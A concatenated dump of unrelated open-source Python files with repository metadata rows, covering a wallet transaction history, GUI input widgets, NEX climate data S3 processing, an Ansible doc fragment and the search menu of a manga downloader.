'succeed rate %.1f%% with %d tasks in '
'duration more than %.3fs',
host, succeed_rate, total_tasks, duration)
return True
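# Example (illustrative; host names and offer payloads are made up): pick an
# offer for a task that just failed on one of two registered hosts.
if __name__ == '__main__':
    manager = TaskHostManager()
    manager.register_host('node-a')
    manager.register_host('node-b')
    manager.task_failed('task-1', 'node-a', 'exit code 1')
    offers = {'node-a': ('offer-a', 1), 'node-b': ('offer-b', 2)}
    # 'node-b' wins: 'node-a' is temporarily masked after its recent failure.
    print(manager.offer_choice('task-1', offers, blacklist=[]))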
| bsd-3-clause | -5,840,643,752,251,686,000 | 36.91875 | 88 | 0.580188 | false |
jeorgen/ngcccbase | ngcccbase/txhistory.py | 4 | 10604 | import time
from coloredcoinlib.store import PersistentDictStore
from asset import AdditiveAssetValue, AssetTarget
from txcons import RawTxSpec
from ngcccbase.address import AddressRecord
def asset_value_to_data(av):
return (av.get_asset().get_id(),
av.get_value())
class TxHistoryEntry(object):
def __init__(self, model, data):
self.txhash = data['txhash']
self.txtime = data['txtime']
self.txtype = data['txtype']
self.data = data
self.model = model
@classmethod
def from_data(cls, model, data):
txtype = data['txtype']
if txtype == 'send':
return TxHistoryEntry_Send(model, data)
elif txtype == 'receive':
return TxHistoryEntry_Receive(model, data)
elif txtype == 'trade':
return TxHistoryEntry_Trade(model, data)
if txtype == 'complex':
return TxHistoryEntry_Complex(model, data)
else:
return TxHistoryEntry(model, data)
class TxHistoryEntry_Send(TxHistoryEntry):
def __init__(self, model, data):
super(TxHistoryEntry_Send, self).__init__(model, data)
self.asset_id = data['asset_id']
self.targets = data['targets']
def get_asset(self):
adm = self.model.get_asset_definition_manager()
return adm.get_asset_by_id(self.asset_id)
def get_fee_asset_target(self):
adm = self.model.get_asset_definition_manager()
asset = adm.get_asset_by_moniker("bitcoin")
fee = self.model.get_blockchain_state().get_tx(self.txhash).get_fee()
asset_value = AdditiveAssetValue(asset=asset, value=fee)
return AssetTarget(None, asset_value)
def get_targets(self):
asset = self.get_asset()
asset_targets = []
for (tgt_addr, tgt_value) in self.targets:
asset_value = AdditiveAssetValue(asset=asset, value=tgt_value)
asset_targets.append(AssetTarget(tgt_addr, asset_value))
try:
asset_targets.append(self.get_fee_asset_target())
except:
pass
return asset_targets
class TxHistoryEntry_Complex(TxHistoryEntry):
def __init__(self, model, data):
super(TxHistoryEntry_Complex, self).__init__(model, data)
self.data = data
def get_deltas(self):
adm = self.model.get_asset_definition_manager()
deltas = []
for assetid, value in self.data['deltas'].items():
deltas.append(adm.get_assetvalue_for_assetid_value(assetid, value))
return deltas
def get_addresses(self):
return ", ".join(self.data['addresses'])
class TxHistoryEntry_Receive(TxHistoryEntry):
def __init__(self, model, data):
super(TxHistoryEntry_Receive, self).__init__(model, data)
self.out_idxs = data['out_idxs']
def get_targets(self):
targets = []
coindb = self.model.get_coin_manager()
adm = self.model.get_asset_definition_manager()
for out_idx in self.out_idxs:
coin = coindb.find_coin(self.txhash, out_idx)
colorvalues = coin.get_colorvalues()
if not colorvalues:
continue
assert len(colorvalues) == 1
asset_value = adm.get_assetvalue_for_colorvalue(
colorvalues[0])
targets.append(AssetTarget(coin.address,
asset_value))
return targets
class TxHistoryEntry_Trade(TxHistoryEntry):
def __init__(self, model, data):
TxHistoryEntry.__init__(self, model, data)
self.in_values = data['in_values']
self.out_values = data['out_values']
def get_values(self, values):
adm = self.model.get_asset_definition_manager()
avalues = []
for asset_id, value in values:
asset = adm.get_asset_by_id(asset_id)
avalues.append(AdditiveAssetValue(asset=asset,
value=value))
return avalues
def get_in_values(self):
return self.get_values(self.in_values)
def get_out_values(self):
return self.get_values(self.out_values)
class TxHistory(object):
def __init__(self, model):
self.model = model
self.entries = PersistentDictStore(
self.model.store_conn.conn, "txhistory")
def decode_entry(self, entry_data):
return TxHistoryEntry.from_data(self.model, entry_data)
def get_entry(self, txhash):
entry = self.entries.get(txhash)
if entry:
return self.decode_entry(entry)
else:
return None
def get_all_entries(self):
return sorted([self.decode_entry(e)
for e in self.entries.values()],
key=lambda txe: txe.txtime)
def populate_history(self):
txdb = self.model.get_tx_db()
for txhash in txdb.get_all_tx_hashes():
if (txhash not in self.entries or # new transaction
not self.entries[txhash]['txtime']): # update unconfirmed
tx_data = txdb.get_tx_by_hash(txhash)['data']
raw_tx = RawTxSpec.from_tx_data(self.model,
tx_data.decode('hex'))
self.add_entry_from_tx(raw_tx)
def get_tx_timestamp(self, txhash): # TODO move to suitable file
txtime = 0
bs = self.model.get_blockchain_state()
blockhash, x = bs.get_tx_blockhash(txhash)
if blockhash:
height = bs.get_block_height(blockhash)
if height:
header = bs.get_header(height)
txtime = header.get('timestamp', txtime)
return txtime
def is_receive_entry(self, raw_tx, spent_coins, received_coins):
return not spent_coins and received_coins
def create_receive_entry(self, raw_tx, received_coins):
txhash = raw_tx.get_hex_txhash()
txtime = self.get_tx_timestamp(txhash)
out_idxs = [coin.outindex for coin in received_coins]
self.entries[txhash] = {"txhash": txhash,
"txtype": 'receive',
"txtime": txtime,
"out_idxs": out_idxs}
def add_trade_entry(self, txhash, in_colorvalue, out_colorvalue):
adm = self.model.get_asset_definition_manager()
in_assetvalue = adm.get_assetvalue_for_colorvalue(in_colorvalue)
out_assetvalue = adm.get_assetvalue_for_colorvalue(out_colorvalue)
txtime = self.get_tx_timestamp(txhash)
self.entries[txhash] = {"txhash": txhash,
"txtype": 'trade',
"txtime": txtime,
"in_values": [asset_value_to_data(in_assetvalue)],
"out_values": [asset_value_to_data(out_assetvalue)]}
def add_unknown_entry(self, txhash):
txtime = self.get_tx_timestamp(txhash)
self.entries[txhash] = {"txhash": txhash,
"txtype": 'unknown',
"txtime": txtime}
def get_delta_color_values(self, spent_coins, received_coins):
adm = self.model.get_asset_definition_manager()
deltas = {}
for coin in received_coins: # add received
for cv in coin.get_colorvalues():
colorid = cv.get_colordef().get_color_id()
assetid = adm.get_asset_by_color_id(colorid).get_id()
deltas[assetid] = deltas.get(assetid, 0) + cv.get_value()
for coin in spent_coins: # subtract sent
for cv in coin.get_colorvalues():
colorid = cv.get_colordef().get_color_id()
assetid = adm.get_asset_by_color_id(colorid).get_id()
deltas[assetid] = deltas.get(assetid, 0) - cv.get_value()
return dict(deltas)
def create_complex_entry(self, raw_tx, spent_coins, received_coins):
am = self.model.get_address_manager()
txhash = raw_tx.get_hex_txhash()
txtime = self.get_tx_timestamp(txhash)
# get addresses
outputs = raw_tx.composed_tx_spec.txouts
wallet_addrs = set([r.address for r in am.get_all_addresses()])
output_addrs = set([out.target_addr for out in outputs])
send_addrs = list(output_addrs.difference(wallet_addrs))
deltas = self.get_delta_color_values(spent_coins, received_coins)
self.entries[txhash] = {
"txhash": txhash,
"txtype": 'complex',
"txtime": txtime,
"addresses" : send_addrs,
"deltas" : deltas,
}
def is_send_entry(self, raw_tx, spent_coins, received_coins):
am = self.model.get_address_manager()
# only inputs from this wallet
input_addrs = set(raw_tx.get_input_addresses())
wallet_addrs = set([r.address for r in am.get_all_addresses()])
if wallet_addrs.intersection(input_addrs) != input_addrs:
return False # foreign inputs
# only one color + uncolored sent
cvlists = [coin.get_colorvalues() for coin in spent_coins]
cvs = [item for sublist in cvlists for item in sublist] # flatten
cids = set([cv.get_color_id() for cv in cvs])
if len(cids) > 2 or (len(cids) == 2 and 0 not in cids):
return False
return False # FIXME disabled for now
def create_send_entry(self, raw_tx, spent_coins, received_coins):
pass # TODO
def add_send_entry(self, txhash, asset, target_addrs, target_values):
self.entries[txhash] = {"txhash": txhash,
"txtype": 'send',
"txtime": int(time.time()),
"asset_id": asset.get_id(),
"targets": zip(target_addrs, target_values)}
def add_entry_from_tx(self, raw_tx):
coindb = self.model.get_coin_manager()
spent_coins, received_coins = coindb.get_coins_for_transaction(raw_tx)
if (not spent_coins) and (not received_coins):
return # no effect
# receive coins
if self.is_receive_entry(raw_tx, spent_coins, received_coins):
self.create_receive_entry(raw_tx, received_coins)
# send coins
elif self.is_send_entry(raw_tx, spent_coins, received_coins):
self.create_send_entry(raw_tx, spent_coins, received_coins)
else: # default for non obvious
self.create_complex_entry(raw_tx, spent_coins, received_coins)
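# Example (illustrative; wallet_model, gold_asset, txhash and target_address are
# placeholders supplied by the surrounding wallet code):
#
#   history = TxHistory(wallet_model)
#   history.add_send_entry(txhash, gold_asset, [target_address], [1500])
#   entry = history.get_entry(txhash)   # -> TxHistoryEntry_Send
#   entry.txtype                        # 'send'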
| mit | 8,367,247,994,701,882,000 | 37.985294 | 84 | 0.578367 | false |
111pontes/ydk-py | cisco-ios-xe/ydk/models/cisco_ios_xe/_meta/_ENTITY_STATE_TC_MIB.py | 1 | 1911 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'EntityoperstateEnum' : _MetaInfoEnum('EntityoperstateEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'disabled':'disabled',
'enabled':'enabled',
'testing':'testing',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
'EntityusagestateEnum' : _MetaInfoEnum('EntityusagestateEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'idle':'idle',
'active':'active',
'busy':'busy',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
'EntityadminstateEnum' : _MetaInfoEnum('EntityadminstateEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'locked':'locked',
'shuttingDown':'shuttingDown',
'unlocked':'unlocked',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
'EntitystandbystatusEnum' : _MetaInfoEnum('EntitystandbystatusEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'hotStandby':'hotStandby',
'coldStandby':'coldStandby',
'providingService':'providingService',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
}
| apache-2.0 | 5,016,428,239,592,756,000 | 42.431818 | 197 | 0.638409 | false |
TalShafir/ansible | lib/ansible/utils/module_docs_fragments/opennebula.py | 33 | 1345 | # -*- coding: utf-8 -*-
#
# Copyright 2018 www.privaz.io Valletech AB
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# OpenNebula common documentation
DOCUMENTATION = '''
options:
api_url:
description:
- The ENDPOINT URL of the XMLRPC server.
If not specified then the value of the ONE_URL environment variable, if any, is used.
aliases:
- api_endpoint
api_username:
description:
- The name of the user for XMLRPC authentication.
If not specified then the value of the ONE_USERNAME environment variable, if any, is used.
api_password:
description:
- The password or token for XMLRPC authentication.
If not specified then the value of the ONE_PASSWORD environment variable, if any, is used.
aliases:
- api_token
validate_certs:
description:
- Whether to validate the SSL certificates or not.
This parameter is ignored if PYTHONHTTPSVERIFY environment variable is used.
type: bool
default: true
wait_timeout:
description:
- time to wait for the desired state to be reached before timeout, in seconds.
default: 300
'''
| gpl-3.0 | 278,576,386,282,889,250 | 35.351351 | 104 | 0.630483 | false |
jjinux/hellacopy | lib/pgu/gui/input.py | 7 | 4938 | """
"""
import pygame
from pygame.locals import *
from const import *
import widget
class Input(widget.Widget):
"""A single line text input.
<pre>Input(value="",size=20)</pre>
<dl>
<dt>value<dd>initial text
<dt>size<dd>size for the text box, in characters
</dl>
<strong>Example</strong>
<code>
w = Input(value="Cuzco the Goat",size=20)
w = Input("Marbles")
</code>
"""
def __init__(self,value="",size=20,**params):
params.setdefault('cls','input')
widget.Widget.__init__(self,**params)
self.value = value
self.pos = len(str(value))
self.vpos = 0
self.font = self.style.font
w,h = self.font.size("e"*size)
if not self.style.height: self.style.height = h
if not self.style.width: self.style.width = w
#self.style.height = max(self.style.height,h)
#self.style.width = max(self.style.width,w)
#self.rect.w=w+self.style.padding_left+self.style.padding_right;
#self.rect.h=h+self.style.padding_top+self.style.padding_bottom;
def paint(self,s):
r = pygame.Rect(0,0,self.rect.w,self.rect.h)
cs = 2 #NOTE: should be in a style
w,h = self.font.size(self.value[0:self.pos])
x = w-self.vpos
if x < 0: self.vpos -= -x
if x+cs > s.get_width(): self.vpos += x+cs-s.get_width()
s.blit(self.font.render(self.value, 1, self.style.color),(-self.vpos,0))
if self.container.myfocus is self:
w,h = self.font.size(self.value[0:self.pos])
r.x = w-self.vpos
r.w = cs
r.h = h
s.fill(self.style.color,r)
def _setvalue(self,v):
self.__dict__['value'] = v
self.send(CHANGE)
def event(self,e):
used = None
if e.type == KEYDOWN:
if e.key == K_BACKSPACE:
if self.pos:
self._setvalue(self.value[:self.pos-1] + self.value[self.pos:])
self.pos -= 1
elif e.key == K_DELETE:
if len(self.value) > self.pos:
self._setvalue(self.value[:self.pos] + self.value[self.pos+1:])
elif e.key == K_HOME:
self.pos = 0
elif e.key == K_END:
self.pos = len(self.value)
elif e.key == K_LEFT:
if self.pos > 0: self.pos -= 1
used = True
elif e.key == K_RIGHT:
if self.pos < len(self.value): self.pos += 1
used = True
elif e.key == K_RETURN:
self.next()
elif e.key == K_TAB:
pass
else:
#c = str(e.unicode)
try:
c = (e.unicode).encode('latin-1')
if c:
self._setvalue(self.value[:self.pos] + c + self.value[self.pos:])
self.pos += 1
except: #ignore weird characters
pass
self.repaint()
elif e.type == FOCUS:
self.repaint()
elif e.type == BLUR:
self.repaint()
self.pcls = ""
if self.container.myfocus is self: self.pcls = "focus"
return used
def __setattr__(self,k,v):
if k == 'value':
if v == None: v = ''
v = str(v)
self.pos = len(v)
_v = self.__dict__.get(k,NOATTR)
self.__dict__[k]=v
if k == 'value' and _v != NOATTR and _v != v:
self.send(CHANGE)
self.repaint()
class Password(Input):
"""A password input, text is *-ed out.
<pre>Password(value="",size=20)</pre>
<dl>
<dt>value<dd>initial text
<dt>size<dd>size for the text box, in characters
</dl>
<strong>Example</strong>
<code>
w = Password(value="password",size=20)
w = Password("53[r3+")
</code>
"""
def paint(self,s):
hidden="*"
show=len(self.value)*hidden
#print "self.value:",self.value
if self.pos == None: self.pos = len(self.value)
r = pygame.Rect(0,0,self.rect.w,self.rect.h)
cs = 2 #NOTE: should be in a style
w,h = self.font.size(show)
x = w-self.vpos
if x < 0: self.vpos -= -x
if x+cs > s.get_width(): self.vpos += x+cs-s.get_width()
s.blit(self.font.render(show, 1, self.style.color),(-self.vpos,0))
if self.container.myfocus is self:
#w,h = self.font.size(self.value[0:self.pos])
w,h = self.font.size(show[0:self.pos])
r.x = w-self.vpos
r.w = cs
r.h = h
s.fill(self.style.color,r)
| gpl-3.0 | -522,209,187,939,049,100 | 28.746988 | 89 | 0.473471 | false |
icomms/rapidsms | lib/rapidsms/parsers/__init__.py | 15 | 1377 | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import re
from keyworder import *
class Matcher:
def __init__(self, msg, pattern_template="^%s$"):
self.tmpl = pattern_template
self.msg = msg
def __getitem__(self, n):
return self.groups[n]
def __call__(self, *patterns):
for pat in patterns:
# assume that one space means
# "any amount of whitespace"
pat = pat.replace(" ", "\s+")
# replace friendly tokens with real chunks
# of regex, to make the patterns more readable
for token, regex in Keyworder.TOKEN_MAP:
pat = pat.replace("(%s)" % token, regex)
# attempt to match the text of the message
# that this object was initialized with
# against the generated pattern
self.match_data = re.match(
self.tmpl % pat,
self.msg.text,
re.IGNORECASE)
# if we had a match, store the groups in
# this instance, and return true. if the
# end of the loop is reached without any
# match, None is returned implicitly
if self.match_data is not None:
self.groupdict = self.match_data.groupdict()
self.groups = self.match_data.groups()
return True
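# Example (illustrative): match a message-like object with a plain regex;
# `FakeMessage` is a stand-in for a real incoming rapidsms message.
if __name__ == "__main__":
    class FakeMessage(object):
        text = "register alice 42"

    matcher = Matcher(FakeMessage())
    if matcher(r"register (\w+) (\d+)"):
        print(matcher[0])  # alice
        print(matcher[1])  # 42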
| lgpl-3.0 | 449,215,866,205,772,540 | 31.785714 | 60 | 0.54321 | false |
institution/mpskit | tdat.py | 1 | 1204 | """ Copyright 2015-2017 sta256+mpskit at gmail.com
This file is part of mpskit.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY.
See LICENSE file for more details.
"""
from common import *
"""
Text DAT: one long null-terminated string, no compression, no madspack
"""
verbose = 0
def read_tdat(name):
check_ext(name, '.DAT')
r = open(name, 'rb').read()
if r.count(b'\x00') > 0:
fail("not tdat file, use rdat instead")
xs = r.split(b"\r\n")
msgs = [decode_string(x) for x in xs]
on = '{}.tdat.json'.format(name)
with open(on, 'w') as f:
json.dump(msgs, f, indent=2, ensure_ascii=False)
output(on)
def write_tdat(name):
check_ext(name, '.DAT')
on = '{}.tdat.json'.format(name)
with open(on, 'r') as f:
msgs = json.load(f)
r = b"\r\n".join([encode_string(s) for s in msgs])
with open(name, 'wb') as f:
f.write(r)
output(name)
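# Example round-trip (illustrative; MESSAGES.DAT is a placeholder file name):
#
#   read_tdat('MESSAGES.DAT')    # dumps the strings to MESSAGES.DAT.tdat.json
#   # ...edit the JSON...
#   write_tdat('MESSAGES.DAT')   # rebuilds MESSAGES.DAT from the edited JSON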
| agpl-3.0 | 1,848,825,729,401,576,700 | 21.296296 | 72 | 0.651163 | false |
yury-s/v8-inspector | Source/chrome/tools/perf/page_sets/page_cycler/dhtml.py | 20 | 1829 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
class DhtmlPage(page_module.Page):
def __init__(self, url, page_set):
super(DhtmlPage, self).__init__(url=url, page_set=page_set)
class DhtmlPageSet(page_set_module.PageSet):
""" DHTML page_cycler benchmark """
def __init__(self):
super(DhtmlPageSet, self).__init__(
# pylint: disable=C0301
serving_dirs=set(['../../../../data/page_cycler/dhtml']),
bucket=page_set_module.PARTNER_BUCKET)
urls_list = [
'file://../../../../data/page_cycler/dhtml/colorfade/',
'file://../../../../data/page_cycler/dhtml/diagball/',
'file://../../../../data/page_cycler/dhtml/fadespacing/',
'file://../../../../data/page_cycler/dhtml/imageslide/',
'file://../../../../data/page_cycler/dhtml/layers1/',
'file://../../../../data/page_cycler/dhtml/layers2/',
'file://../../../../data/page_cycler/dhtml/layers4/',
'file://../../../../data/page_cycler/dhtml/layers5/',
'file://../../../../data/page_cycler/dhtml/layers6/',
'file://../../../../data/page_cycler/dhtml/meter/',
'file://../../../../data/page_cycler/dhtml/movingtext/',
'file://../../../../data/page_cycler/dhtml/mozilla/',
'file://../../../../data/page_cycler/dhtml/replaceimages/',
'file://../../../../data/page_cycler/dhtml/scrolling/',
'file://../../../../data/page_cycler/dhtml/slidein/',
'file://../../../../data/page_cycler/dhtml/slidingballs/',
'file://../../../../data/page_cycler/dhtml/zoom/'
]
for url in urls_list:
self.AddUserStory(DhtmlPage(url, self))
| bsd-3-clause | -250,426,505,711,858,140 | 39.644444 | 72 | 0.583379 | false |
azavea/nex2json-ingest | chunker/process_dataset.py | 2 | 3546 | #!/usr/bin/env python
"""
Code for extracting data about cities from NEX climate data.
Performs the following pipeline:
    1. Read the netCDF file from S3
2. Run nex2json on the dataset
3. Upload result to the appropriate bucket
"""
import argparse
import os
import re
import shutil
import tempfile
import logging
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from nex2json import nex2json
from nex import BASE_TIMES
logger = logging.getLogger()
def generate_s3_path(rcp, var, model, year):
FORMAT = ('s3://nasanex/NEX-GDDP/BCSD/{rcp}/day/atmos/{var}/r1i1p1/'
'v1.0/{var}_day_BCSD_{rcp}_r1i1p1_{model}_{year}.nc')
return FORMAT.format(rcp=rcp, var=var, model=model, year=year)
def read_from_s3(s3path):
"""
Downloads a NetCDF file from s3
Returns a tuple with the s3 key name and the destination
"""
m = re.match('s3://([^/]+)/(.+)', s3path)
if m:
bucket_name = m.group(1)
key_name = m.group(2)
conn = S3Connection()
bucket = conn.get_bucket(bucket_name)
key = bucket.get_key(key_name)
(handle, file_path) = tempfile.mkstemp(suffix='.nc')
logger.info('Saving to {}'.format(file_path))
with os.fdopen(handle, 'wb') as tmp:
key.get_file(tmp)
return (key.name, file_path)
else:
logger.error('ERROR: cannot parse s3key %s', s3path)
return None
def upload_to_s3(data_dir, var, rcp, model, target_bucket):
"""
Uploads a directory to s3, prepending the rcp, var and model
to the s3 key as a path
"""
conn = S3Connection()
bucket = conn.get_bucket(target_bucket)
for filename in os.listdir(data_dir):
path = os.path.join(data_dir, filename)
key = Key(bucket)
key.key = '{}/{}/{}/{}'.format(rcp, var, model, filename)
logger.info('Uploading %s to %s', filename, key.key)
key.set_contents_from_filename(path)
def process_dataset(rcp, var, model, year, target_bucket):
"""
Download a NetCDF file from s3, extract and convert its contents to
json, and upload the json to a target bucket.
"""
s3path = generate_s3_path(rcp, var, model, year)
(s3key, path) = read_from_s3(s3path)
s3basename = os.path.splitext(os.path.basename(s3key))[0]
try:
tempdir = tempfile.mkdtemp()
logger.info('Tiling to %s', tempdir)
nex2json(path, tempdir, var, s3basename, model, BASE_TIMES[model])
try:
upload_to_s3(tempdir, var, rcp, model, target_bucket)
finally:
logger.info('Deleting directory %s', tempdir)
shutil.rmtree(tempdir)
finally:
logger.info('Deleting %s', path)
os.remove(path)
def main():
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('rcp', metavar='RCP', type=str,
help='rcp45 or rcp85')
parser.add_argument('var', metavar='VAR', type=str,
help='pr, tasmax, or tasmin')
parser.add_argument('model', metavar='MODEL', type=str,
help='model name')
parser.add_argument('year', metavar='YEAR', type=int,
help='year')
parser.add_argument('target', metavar='TARGET', type=str,
help='target bucket')
args = parser.parse_args()
process_dataset(args.rcp, args.var, args.model, args.year, args.target)
if __name__ == '__main__':
main()
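# Example invocation (illustrative model/year/bucket values):
#
#   python process_dataset.py rcp85 tasmin ACCESS1-0 2050 my-output-bucket
#
# downloads s3://nasanex/NEX-GDDP/BCSD/rcp85/day/atmos/tasmin/r1i1p1/v1.0/
# tasmin_day_BCSD_rcp85_r1i1p1_ACCESS1-0_2050.nc, tiles it with nex2json, and
# uploads the resulting JSON under rcp85/tasmin/ACCESS1-0/ in the target bucket.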
| apache-2.0 | 6,896,905,364,341,792,000 | 30.380531 | 75 | 0.617597 | false |
CZAlmon/MangaMine | MangaMine.py | 1 | 100653 | #Ver. 0.6.1
#Authors: Dylan Wise & Zach Almon
import urllib.request
import re
import os
import platform
import sys
import string
import html
import time
platformType = platform.system()
#site_number:
# Bato.to = 1
# Panda = 2
# Here = 3
def Search_Feature(site_number, file_directory):
    """Prompt the user to pick a manga and return its top-page URL.

    site_number selects which site's block of Manga_Database.txt to read
    (1 = Bato.to, 2 = MangaPanda, 3 = MangaHere); file_directory is the folder
    containing Manga_Database.txt. The user may also paste a direct link,
    which is returned unchanged.
    """
set_of_letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
search_list_names = []
search_list_links = []
lines_from_file = []
with open((file_directory + "Manga_Database.txt"), "r") as f:
for line_in_text in f:
temp_string = line_in_text
lines_from_file.append(temp_string)
lines_from_file.pop(0) #Pop the warning off of the TextFile
lines_from_file.pop(0) #Pop the warning off of the TextFile
if site_number == 1:
lines_from_file.pop(0)
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
specific_sites_lines = []
for i in range(len(lines_from_file)):
temp_string = lines_from_file[i]
temp_string = temp_string[:-1] #Get rid of '\n' The Newline character
specific_sites_lines.append(temp_string)
counter += 1
if counter == my_int_number:
break
elif site_number == 2:
lines_from_file.pop(0)
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
for i in range(len(lines_from_file)):
lines_from_file.pop(0)
counter += 1
if counter == my_int_number:
break
lines_from_file.pop(0) #Extra Newline Pop
lines_from_file.pop(0) #Stars Pop
lines_from_file.pop(0) #Panda Name Pop
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
specific_sites_lines = []
for i in range(len(lines_from_file)):
temp_string = lines_from_file[i]
temp_string = temp_string[:-1] #Get rid of '\n' The Newline character
specific_sites_lines.append(temp_string)
counter += 1
if counter == my_int_number:
break
elif site_number == 3:
lines_from_file.pop(0)
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
for i in range(len(lines_from_file)):
lines_from_file.pop(0)
counter += 1
if counter == my_int_number:
break
lines_from_file.pop(0) #Extra Newline Pop
lines_from_file.pop(0) #Stars Pop
lines_from_file.pop(0) #Panda Name Pop
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
for i in range(len(lines_from_file)):
lines_from_file.pop(0)
counter += 1
if counter == my_int_number:
break
lines_from_file.pop(0) #Extra Newline Pop
lines_from_file.pop(0) #Stars Pop
lines_from_file.pop(0) #Here Name Pop
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
specific_sites_lines = []
for i in range(len(lines_from_file)):
temp_string = lines_from_file[i]
temp_string = temp_string[:-1] #Get rid of '\n' The Newline character
specific_sites_lines.append(temp_string)
counter += 1
if counter == my_int_number:
break
else:
print('Invalid Site Number! Program Terminated')
exit()
lines_from_list = []
for i in range(len(specific_sites_lines)):
lines_from_list = specific_sites_lines[i].split("\t")
search_list_names.append(lines_from_list[0])
search_list_links.append(lines_from_list[1])
#Actual Input Decision Making After Here:
search_list_letters = []
search_list_letter_links = []
search_found_bool = False #Search is/isnt found
search_quit_bool = False
    search_int = 0 #Index of the chosen manga in the search results
while True:
print('You have 2 options to choose the manga you want to download.')
print('Do you want to provide a direct [l]ink or [s]earch for a manga?')
print('\tOr do you want to [q]uit the program?\n')
urlRequest = input('')
print()
if urlRequest == 'q':
exit()
elif urlRequest == 'l':
print('Please enter the url of the manga you wish to download (or q to quit): ')
print('The Link needs to be the top page of the manga you wish to download like:')
print('Ex. 1:\thttp://bato.to/comic/_/comics/seto-no-hanayome-r385')
print('Ex. 2:\thttp://www.mangapanda.com/372/seto-no-hanayome.html')
print('Ex. 3:\thttp://www.mangahere.co/manga/seto_no_hanayome/')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
exit()
else:
return urlRequest
elif urlRequest == 's':
print('To Search for a Manga Title, Please input a Letter')
print('A - Z to choose a manga starting with that letter')
print('\'Misc\' for manga not starting with a letter')
print('or \'Quit\' to quit the search\n')
search_input = input('')
print()
#We need everything in the string to be lower case.
search_input = search_input.lower()
#Set of letters is a hard coded list
if search_input in set_of_letters or search_input == 'misc':
if search_input in set_of_letters:
#Get the list of mangas in the specific letter
for i in range(len(search_list_names)):
if search_list_names[i][0] == search_input.lower() or search_list_names[i][0] == search_input.upper():
search_list_letters.append(search_list_names[i])
search_list_letter_links.append(search_list_links[i])
elif search_input == 'misc':
print('Warning!! Some of these manga have special characters.')
print('These manga will display like: ')
print('"0\\xc3\\x970 Memories" instead of 0 (Special Characters) 0 Memories')
print('These special (unicode) Characters can\'t be displayed here. Sorry.')
print('You will still be able to search for the manga you want, just don\'t')
print('overlook anything with something like: \\xc95\\x73 \n\n')
time.sleep(10)
#Get the list of mangas that are misc
for i in range(len(search_list_names)):
if search_list_names[i][0] not in set_of_letters:
search_list_letters.append(search_list_names[i])
search_list_letter_links.append(search_list_links[i])
else:
print('Fatal Error with search input!')
exit()
print('Here is a list of the first 50 Manga Names.')
print('Keep in mind you cannot go back')
print('\tYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
for i in range(len(search_list_letters)):
#Plus one here So there will be a minus one later!!!
print('Number ' + str(i+1) + ' ' + search_list_letters[i])
if i % 50 == 49 or (i == (len(search_list_letters) - 1)):
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
while True:
print('Choose:')
search_input = input('')
print('\n')
if search_input.isdigit():
                                if int(search_input) > 0 and int(search_input) <= len(search_list_letters):
print('Your choice is: ' + search_list_letters[int(search_input)-1], end = '\n\n')
search_int = (int(search_input) - 1) #Subtract one for the option before
search_found_bool = True
break
else:
                                    print('Your choice needs to be between 1 and ' + str(len(search_list_letters)))
elif search_input == 'n':
print('\nThe next 50 manga:\n')
break
elif search_input == 'q':
search_quit_bool = True
break
elif search_input == 'l':
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
else:
